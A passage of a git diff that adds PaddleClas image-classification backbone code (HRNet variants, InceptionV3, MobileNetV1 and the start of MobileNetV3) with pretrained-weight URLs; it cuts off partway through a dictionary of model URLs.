_load_pretrained(pretrained, model, MODEL_URLS["HRNet_W18_C"], use_ssld) + return model + + +def HRNet_W30_C(pretrained=False, use_ssld=False, **kwargs): + """ + HRNet_W30_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `HRNet_W30_C` model depends on args. + """ + model = HRNet(width=30, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["HRNet_W30_C"], use_ssld) + return model + + +def HRNet_W32_C(pretrained=False, use_ssld=False, **kwargs): + """ + HRNet_W32_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `HRNet_W32_C` model depends on args. + """ + model = HRNet(width=32, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["HRNet_W32_C"], use_ssld) + return model + + +def HRNet_W40_C(pretrained=False, use_ssld=False, **kwargs): + """ + HRNet_W40_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `HRNet_W40_C` model depends on args. + """ + model = HRNet(width=40, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["HRNet_W40_C"], use_ssld) + return model + + +def HRNet_W44_C(pretrained=False, use_ssld=False, **kwargs): + """ + HRNet_W44_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `HRNet_W44_C` model depends on args. + """ + model = HRNet(width=44, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["HRNet_W44_C"], use_ssld) + return model + + +def HRNet_W48_C(pretrained=False, use_ssld=False, **kwargs): + """ + HRNet_W48_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `HRNet_W48_C` model depends on args. + """ + model = HRNet(width=48, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["HRNet_W48_C"], use_ssld) + return model + + +def HRNet_W60_C(pretrained=False, use_ssld=False, **kwargs): + """ + HRNet_W60_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `HRNet_W60_C` model depends on args. + """ + model = HRNet(width=60, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["HRNet_W60_C"], use_ssld) + return model + + +def HRNet_W64_C(pretrained=False, use_ssld=False, **kwargs): + """ + HRNet_W64_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `HRNet_W64_C` model depends on args. + """ + model = HRNet(width=64, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["HRNet_W64_C"], use_ssld) + return model + + +def SE_HRNet_W18_C(pretrained=False, use_ssld=False, **kwargs): + """ + SE_HRNet_W18_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `SE_HRNet_W18_C` model depends on args. + """ + model = HRNet(width=18, has_se=True, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["SE_HRNet_W18_C"], use_ssld) + return model + + +def SE_HRNet_W30_C(pretrained=False, use_ssld=False, **kwargs): + """ + SE_HRNet_W30_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `SE_HRNet_W30_C` model depends on args. + """ + model = HRNet(width=30, has_se=True, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["SE_HRNet_W30_C"], use_ssld) + return model + + +def SE_HRNet_W32_C(pretrained=False, use_ssld=False, **kwargs): + """ + SE_HRNet_W32_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `SE_HRNet_W32_C` model depends on args. + """ + model = HRNet(width=32, has_se=True, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["SE_HRNet_W32_C"], use_ssld) + return model + + +def SE_HRNet_W40_C(pretrained=False, use_ssld=False, **kwargs): + """ + SE_HRNet_W40_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `SE_HRNet_W40_C` model depends on args. + """ + model = HRNet(width=40, has_se=True, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["SE_HRNet_W40_C"], use_ssld) + return model + + +def SE_HRNet_W44_C(pretrained=False, use_ssld=False, **kwargs): + """ + SE_HRNet_W44_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `SE_HRNet_W44_C` model depends on args. + """ + model = HRNet(width=44, has_se=True, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["SE_HRNet_W44_C"], use_ssld) + return model + + +def SE_HRNet_W48_C(pretrained=False, use_ssld=False, **kwargs): + """ + SE_HRNet_W48_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `SE_HRNet_W48_C` model depends on args. + """ + model = HRNet(width=48, has_se=True, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["SE_HRNet_W48_C"], use_ssld) + return model + + +def SE_HRNet_W60_C(pretrained=False, use_ssld=False, **kwargs): + """ + SE_HRNet_W60_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `SE_HRNet_W60_C` model depends on args. + """ + model = HRNet(width=60, has_se=True, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["SE_HRNet_W60_C"], use_ssld) + return model + + +def SE_HRNet_W64_C(pretrained=False, use_ssld=False, **kwargs): + """ + SE_HRNet_W64_C + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `SE_HRNet_W64_C` model depends on args. + """ + model = HRNet(width=64, has_se=True, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["SE_HRNet_W64_C"], use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/inception_v3.py b/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/inception_v3.py new file mode 100644 index 0000000..50fbcb4 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/inception_v3.py @@ -0,0 +1,539 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import, division, print_function +import math +import paddle +from paddle import ParamAttr +import paddle.nn as nn +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform + +from ppcls.arch.backbone.base.theseus_layer import TheseusLayer +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "InceptionV3": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/InceptionV3_pretrained.pdparams" +} + +__all__ = MODEL_URLS.keys() +''' +InceptionV3 config: dict. + key: inception blocks of InceptionV3. + values: conv num in different blocks. +''' +NET_CONFIG = { + "inception_a": [[192, 256, 288], [32, 64, 64]], + "inception_b": [288], + "inception_c": [[768, 768, 768, 768], [128, 160, 160, 192]], + "inception_d": [768], + "inception_e": [1280, 2048] +} + + +class ConvBNLayer(TheseusLayer): + def __init__(self, + num_channels, + num_filters, + filter_size, + stride=1, + padding=0, + groups=1, + act="relu"): + super().__init__() + self.act = act + self.conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=padding, + groups=groups, + bias_attr=False) + self.bn = BatchNorm(num_filters) + self.relu = nn.ReLU() + + def forward(self, x): + x = self.conv(x) + x = self.bn(x) + if self.act: + x = self.relu(x) + return x + + +class InceptionStem(TheseusLayer): + def __init__(self): + super().__init__() + self.conv_1a_3x3 = ConvBNLayer( + num_channels=3, + num_filters=32, + filter_size=3, + stride=2, + act="relu") + self.conv_2a_3x3 = ConvBNLayer( + num_channels=32, + num_filters=32, + filter_size=3, + stride=1, + act="relu") + self.conv_2b_3x3 = ConvBNLayer( + num_channels=32, + num_filters=64, + filter_size=3, + padding=1, + act="relu") + + self.max_pool = MaxPool2D(kernel_size=3, stride=2, padding=0) + self.conv_3b_1x1 = ConvBNLayer( + num_channels=64, num_filters=80, filter_size=1, act="relu") + self.conv_4a_3x3 = ConvBNLayer( + num_channels=80, num_filters=192, filter_size=3, act="relu") + + def forward(self, x): + x = self.conv_1a_3x3(x) + x = self.conv_2a_3x3(x) + x = self.conv_2b_3x3(x) + x = self.max_pool(x) + x = self.conv_3b_1x1(x) + x = self.conv_4a_3x3(x) + x = self.max_pool(x) + return x + + +class InceptionA(TheseusLayer): + def __init__(self, num_channels, pool_features): + super().__init__() + self.branch1x1 = ConvBNLayer( + num_channels=num_channels, + num_filters=64, + filter_size=1, + act="relu") + self.branch5x5_1 = ConvBNLayer( + num_channels=num_channels, + num_filters=48, + filter_size=1, + act="relu") + self.branch5x5_2 = ConvBNLayer( + num_channels=48, + num_filters=64, + filter_size=5, + padding=2, + act="relu") + + self.branch3x3dbl_1 = ConvBNLayer( + num_channels=num_channels, + num_filters=64, + filter_size=1, + act="relu") + self.branch3x3dbl_2 = ConvBNLayer( + num_channels=64, + num_filters=96, + filter_size=3, + padding=1, + act="relu") + self.branch3x3dbl_3 = ConvBNLayer( + num_channels=96, + num_filters=96, + filter_size=3, + padding=1, + act="relu") + self.branch_pool = AvgPool2D( + kernel_size=3, stride=1, padding=1, exclusive=False) + self.branch_pool_conv = ConvBNLayer( + num_channels=num_channels, + num_filters=pool_features, + filter_size=1, + act="relu") + + def forward(self, x): + branch1x1 = self.branch1x1(x) + branch5x5 = self.branch5x5_1(x) + branch5x5 = self.branch5x5_2(branch5x5) + + branch3x3dbl = self.branch3x3dbl_1(x) + branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl) + branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl) + + branch_pool = self.branch_pool(x) + branch_pool = self.branch_pool_conv(branch_pool) + x = paddle.concat( + [branch1x1, branch5x5, branch3x3dbl, branch_pool], axis=1) + return x + + +class InceptionB(TheseusLayer): + def __init__(self, num_channels): + super().__init__() + self.branch3x3 = ConvBNLayer( + num_channels=num_channels, + num_filters=384, + filter_size=3, + stride=2, + act="relu") + self.branch3x3dbl_1 = ConvBNLayer( + num_channels=num_channels, + num_filters=64, + filter_size=1, + act="relu") + self.branch3x3dbl_2 = ConvBNLayer( + num_channels=64, + num_filters=96, + filter_size=3, + padding=1, + act="relu") + self.branch3x3dbl_3 = ConvBNLayer( + num_channels=96, + num_filters=96, + filter_size=3, + stride=2, + act="relu") + self.branch_pool = MaxPool2D(kernel_size=3, stride=2) + + def forward(self, x): + branch3x3 = self.branch3x3(x) + + branch3x3dbl = self.branch3x3dbl_1(x) + branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl) + branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl) + + branch_pool = self.branch_pool(x) + + x = paddle.concat([branch3x3, branch3x3dbl, branch_pool], axis=1) + + return x + + +class InceptionC(TheseusLayer): + def __init__(self, num_channels, channels_7x7): + super().__init__() + self.branch1x1 = ConvBNLayer( + num_channels=num_channels, + num_filters=192, + filter_size=1, + act="relu") + + self.branch7x7_1 = ConvBNLayer( + num_channels=num_channels, + num_filters=channels_7x7, + filter_size=1, + stride=1, + act="relu") + self.branch7x7_2 = ConvBNLayer( + num_channels=channels_7x7, + num_filters=channels_7x7, + filter_size=(1, 7), + stride=1, + padding=(0, 3), + act="relu") + self.branch7x7_3 = ConvBNLayer( + num_channels=channels_7x7, + num_filters=192, + filter_size=(7, 1), + stride=1, + padding=(3, 0), + act="relu") + + self.branch7x7dbl_1 = ConvBNLayer( + num_channels=num_channels, + num_filters=channels_7x7, + filter_size=1, + act="relu") + self.branch7x7dbl_2 = ConvBNLayer( + num_channels=channels_7x7, + num_filters=channels_7x7, + filter_size=(7, 1), + padding=(3, 0), + act="relu") + self.branch7x7dbl_3 = ConvBNLayer( + num_channels=channels_7x7, + num_filters=channels_7x7, + filter_size=(1, 7), + padding=(0, 3), + act="relu") + self.branch7x7dbl_4 = ConvBNLayer( + num_channels=channels_7x7, + num_filters=channels_7x7, + filter_size=(7, 1), + padding=(3, 0), + act="relu") + self.branch7x7dbl_5 = ConvBNLayer( + num_channels=channels_7x7, + num_filters=192, + filter_size=(1, 7), + padding=(0, 3), + act="relu") + + self.branch_pool = AvgPool2D( + kernel_size=3, stride=1, padding=1, exclusive=False) + self.branch_pool_conv = ConvBNLayer( + num_channels=num_channels, + num_filters=192, + filter_size=1, + act="relu") + + def forward(self, x): + branch1x1 = self.branch1x1(x) + + branch7x7 = self.branch7x7_1(x) + branch7x7 = self.branch7x7_2(branch7x7) + branch7x7 = self.branch7x7_3(branch7x7) + + branch7x7dbl = self.branch7x7dbl_1(x) + branch7x7dbl = self.branch7x7dbl_2(branch7x7dbl) + branch7x7dbl = self.branch7x7dbl_3(branch7x7dbl) + branch7x7dbl = self.branch7x7dbl_4(branch7x7dbl) + branch7x7dbl = self.branch7x7dbl_5(branch7x7dbl) + + branch_pool = self.branch_pool(x) + branch_pool = self.branch_pool_conv(branch_pool) + + x = paddle.concat( + [branch1x1, branch7x7, branch7x7dbl, branch_pool], axis=1) + + return x + + +class InceptionD(TheseusLayer): + def __init__(self, num_channels): + super().__init__() + self.branch3x3_1 = ConvBNLayer( + num_channels=num_channels, + num_filters=192, + filter_size=1, + act="relu") + self.branch3x3_2 = ConvBNLayer( + num_channels=192, + num_filters=320, + filter_size=3, + stride=2, + act="relu") + self.branch7x7x3_1 = ConvBNLayer( + num_channels=num_channels, + num_filters=192, + filter_size=1, + act="relu") + self.branch7x7x3_2 = ConvBNLayer( + num_channels=192, + num_filters=192, + filter_size=(1, 7), + padding=(0, 3), + act="relu") + self.branch7x7x3_3 = ConvBNLayer( + num_channels=192, + num_filters=192, + filter_size=(7, 1), + padding=(3, 0), + act="relu") + self.branch7x7x3_4 = ConvBNLayer( + num_channels=192, + num_filters=192, + filter_size=3, + stride=2, + act="relu") + self.branch_pool = MaxPool2D(kernel_size=3, stride=2) + + def forward(self, x): + branch3x3 = self.branch3x3_1(x) + branch3x3 = self.branch3x3_2(branch3x3) + + branch7x7x3 = self.branch7x7x3_1(x) + branch7x7x3 = self.branch7x7x3_2(branch7x7x3) + branch7x7x3 = self.branch7x7x3_3(branch7x7x3) + branch7x7x3 = self.branch7x7x3_4(branch7x7x3) + + branch_pool = self.branch_pool(x) + + x = paddle.concat([branch3x3, branch7x7x3, branch_pool], axis=1) + return x + + +class InceptionE(TheseusLayer): + def __init__(self, num_channels): + super().__init__() + self.branch1x1 = ConvBNLayer( + num_channels=num_channels, + num_filters=320, + filter_size=1, + act="relu") + self.branch3x3_1 = ConvBNLayer( + num_channels=num_channels, + num_filters=384, + filter_size=1, + act="relu") + self.branch3x3_2a = ConvBNLayer( + num_channels=384, + num_filters=384, + filter_size=(1, 3), + padding=(0, 1), + act="relu") + self.branch3x3_2b = ConvBNLayer( + num_channels=384, + num_filters=384, + filter_size=(3, 1), + padding=(1, 0), + act="relu") + + self.branch3x3dbl_1 = ConvBNLayer( + num_channels=num_channels, + num_filters=448, + filter_size=1, + act="relu") + self.branch3x3dbl_2 = ConvBNLayer( + num_channels=448, + num_filters=384, + filter_size=3, + padding=1, + act="relu") + self.branch3x3dbl_3a = ConvBNLayer( + num_channels=384, + num_filters=384, + filter_size=(1, 3), + padding=(0, 1), + act="relu") + self.branch3x3dbl_3b = ConvBNLayer( + num_channels=384, + num_filters=384, + filter_size=(3, 1), + padding=(1, 0), + act="relu") + self.branch_pool = AvgPool2D( + kernel_size=3, stride=1, padding=1, exclusive=False) + self.branch_pool_conv = ConvBNLayer( + num_channels=num_channels, + num_filters=192, + filter_size=1, + act="relu") + + def forward(self, x): + branch1x1 = self.branch1x1(x) + + branch3x3 = self.branch3x3_1(x) + branch3x3 = [ + self.branch3x3_2a(branch3x3), + self.branch3x3_2b(branch3x3), + ] + branch3x3 = paddle.concat(branch3x3, axis=1) + + branch3x3dbl = self.branch3x3dbl_1(x) + branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl) + branch3x3dbl = [ + self.branch3x3dbl_3a(branch3x3dbl), + self.branch3x3dbl_3b(branch3x3dbl), + ] + branch3x3dbl = paddle.concat(branch3x3dbl, axis=1) + + branch_pool = self.branch_pool(x) + branch_pool = self.branch_pool_conv(branch_pool) + + x = paddle.concat( + [branch1x1, branch3x3, branch3x3dbl, branch_pool], axis=1) + return x + + +class Inception_V3(TheseusLayer): + """ + Inception_V3 + Args: + config: dict. config of Inception_V3. + class_num: int=1000. The number of classes. + pretrained: (True or False) or path of pretrained_model. Whether to load the pretrained model. + Returns: + model: nn.Layer. Specific Inception_V3 model depends on args. + """ + + def __init__(self, config, class_num=1000, return_patterns=None): + super().__init__() + + self.inception_a_list = config["inception_a"] + self.inception_c_list = config["inception_c"] + self.inception_b_list = config["inception_b"] + self.inception_d_list = config["inception_d"] + self.inception_e_list = config["inception_e"] + + self.inception_stem = InceptionStem() + + self.inception_block_list = nn.LayerList() + for i in range(len(self.inception_a_list[0])): + inception_a = InceptionA(self.inception_a_list[0][i], + self.inception_a_list[1][i]) + self.inception_block_list.append(inception_a) + + for i in range(len(self.inception_b_list)): + inception_b = InceptionB(self.inception_b_list[i]) + self.inception_block_list.append(inception_b) + + for i in range(len(self.inception_c_list[0])): + inception_c = InceptionC(self.inception_c_list[0][i], + self.inception_c_list[1][i]) + self.inception_block_list.append(inception_c) + + for i in range(len(self.inception_d_list)): + inception_d = InceptionD(self.inception_d_list[i]) + self.inception_block_list.append(inception_d) + + for i in range(len(self.inception_e_list)): + inception_e = InceptionE(self.inception_e_list[i]) + self.inception_block_list.append(inception_e) + + self.avg_pool = AdaptiveAvgPool2D(1) + self.dropout = Dropout(p=0.2, mode="downscale_in_infer") + stdv = 1.0 / math.sqrt(2048 * 1.0) + self.fc = Linear( + 2048, + class_num, + weight_attr=ParamAttr(initializer=Uniform(-stdv, stdv)), + bias_attr=ParamAttr()) + if return_patterns is not None: + self.update_res(return_patterns) + self.register_forward_post_hook(self._return_dict_hook) + + def forward(self, x): + x = self.inception_stem(x) + for inception_block in self.inception_block_list: + x = inception_block(x) + x = self.avg_pool(x) + x = paddle.reshape(x, shape=[-1, 2048]) + x = self.dropout(x) + x = self.fc(x) + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def InceptionV3(pretrained=False, use_ssld=False, **kwargs): + """ + InceptionV3 + Args: + pretrained: bool=false or str. if `true` load pretrained parameters, `false` otherwise. + if str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `InceptionV3` model + """ + model = Inception_V3(NET_CONFIG, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["InceptionV3"], use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/mobilenet_v1.py b/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/mobilenet_v1.py new file mode 100644 index 0000000..944bdb1 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/mobilenet_v1.py @@ -0,0 +1,234 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import, division, print_function + +from paddle import ParamAttr +import paddle.nn as nn +from paddle.nn import Conv2D, BatchNorm, Linear, ReLU, Flatten +from paddle.nn import AdaptiveAvgPool2D +from paddle.nn.initializer import KaimingNormal + +from ppcls.arch.backbone.base.theseus_layer import TheseusLayer +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "MobileNetV1_x0_25": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/MobileNetV1_x0_25_pretrained.pdparams", + "MobileNetV1_x0_5": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/MobileNetV1_x0_5_pretrained.pdparams", + "MobileNetV1_x0_75": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/MobileNetV1_x0_75_pretrained.pdparams", + "MobileNetV1": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/MobileNetV1_pretrained.pdparams" +} + +__all__ = MODEL_URLS.keys() + + +class ConvBNLayer(TheseusLayer): + def __init__(self, + num_channels, + filter_size, + num_filters, + stride, + padding, + num_groups=1): + super().__init__() + + self.conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=padding, + groups=num_groups, + weight_attr=ParamAttr(initializer=KaimingNormal()), + bias_attr=False) + self.bn = BatchNorm(num_filters) + self.relu = ReLU() + + def forward(self, x): + x = self.conv(x) + x = self.bn(x) + x = self.relu(x) + return x + + +class DepthwiseSeparable(TheseusLayer): + def __init__(self, num_channels, num_filters1, num_filters2, num_groups, + stride, scale): + super().__init__() + + self.depthwise_conv = ConvBNLayer( + num_channels=num_channels, + num_filters=int(num_filters1 * scale), + filter_size=3, + stride=stride, + padding=1, + num_groups=int(num_groups * scale)) + + self.pointwise_conv = ConvBNLayer( + num_channels=int(num_filters1 * scale), + filter_size=1, + num_filters=int(num_filters2 * scale), + stride=1, + padding=0) + + def forward(self, x): + x = self.depthwise_conv(x) + x = self.pointwise_conv(x) + return x + + +class MobileNet(TheseusLayer): + """ + MobileNet + Args: + scale: float=1.0. The coefficient that controls the size of network parameters. + class_num: int=1000. The number of classes. + Returns: + model: nn.Layer. Specific MobileNet model depends on args. + """ + + def __init__(self, scale=1.0, class_num=1000, return_patterns=None): + super().__init__() + self.scale = scale + + self.conv = ConvBNLayer( + num_channels=3, + filter_size=3, + num_filters=int(32 * scale), + stride=2, + padding=1) + + #num_channels, num_filters1, num_filters2, num_groups, stride + self.cfg = [[int(32 * scale), 32, 64, 32, 1], + [int(64 * scale), 64, 128, 64, 2], + [int(128 * scale), 128, 128, 128, 1], + [int(128 * scale), 128, 256, 128, 2], + [int(256 * scale), 256, 256, 256, 1], + [int(256 * scale), 256, 512, 256, 2], + [int(512 * scale), 512, 512, 512, 1], + [int(512 * scale), 512, 512, 512, 1], + [int(512 * scale), 512, 512, 512, 1], + [int(512 * scale), 512, 512, 512, 1], + [int(512 * scale), 512, 512, 512, 1], + [int(512 * scale), 512, 1024, 512, 2], + [int(1024 * scale), 1024, 1024, 1024, 1]] + + self.blocks = nn.Sequential(*[ + DepthwiseSeparable( + num_channels=params[0], + num_filters1=params[1], + num_filters2=params[2], + num_groups=params[3], + stride=params[4], + scale=scale) for params in self.cfg + ]) + + self.avg_pool = AdaptiveAvgPool2D(1) + self.flatten = Flatten(start_axis=1, stop_axis=-1) + + self.fc = Linear( + int(1024 * scale), + class_num, + weight_attr=ParamAttr(initializer=KaimingNormal())) + if return_patterns is not None: + self.update_res(return_patterns) + self.register_forward_post_hook(self._return_dict_hook) + + def forward(self, x): + x = self.conv(x) + x = self.blocks(x) + x = self.avg_pool(x) + x = self.flatten(x) + x = self.fc(x) + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def MobileNetV1_x0_25(pretrained=False, use_ssld=False, **kwargs): + """ + MobileNetV1_x0_25 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `MobileNetV1_x0_25` model depends on args. + """ + model = MobileNet(scale=0.25, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV1_x0_25"], + use_ssld) + return model + + +def MobileNetV1_x0_5(pretrained=False, use_ssld=False, **kwargs): + """ + MobileNetV1_x0_5 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `MobileNetV1_x0_5` model depends on args. + """ + model = MobileNet(scale=0.5, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV1_x0_5"], + use_ssld) + return model + + +def MobileNetV1_x0_75(pretrained=False, use_ssld=False, **kwargs): + """ + MobileNetV1_x0_75 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `MobileNetV1_x0_75` model depends on args. + """ + model = MobileNet(scale=0.75, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV1_x0_75"], + use_ssld) + return model + + +def MobileNetV1(pretrained=False, use_ssld=False, **kwargs): + """ + MobileNetV1 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `MobileNetV1` model depends on args. + """ + model = MobileNet(scale=1.0, **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV1"], use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/mobilenet_v3.py b/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/mobilenet_v3.py new file mode 100644 index 0000000..438e48a --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/mobilenet_v3.py @@ -0,0 +1,561 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import, division, print_function + +import paddle +import paddle.nn as nn +from paddle import ParamAttr +from paddle.nn import AdaptiveAvgPool2D, BatchNorm, Conv2D, Dropout, Linear +from paddle.regularizer import L2Decay +from ppcls.arch.backbone.base.theseus_layer import TheseusLayer +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "MobileNetV3_small_x0_35": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/MobileNetV3_small_x0_35_pretrained.pdparams", + "MobileNetV3_small_x0_5": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/MobileNetV3_small_x0_5_pretrained.pdparams", + "MobileNetV3_small_x0_75": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/MobileNetV3_small_x0_75_pretrained.pdparams", + "MobileNetV3_small_x1_0": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/MobileNetV3_small_x1_0_pretrained.pdparams", + "MobileNetV3_small_x1_25": + 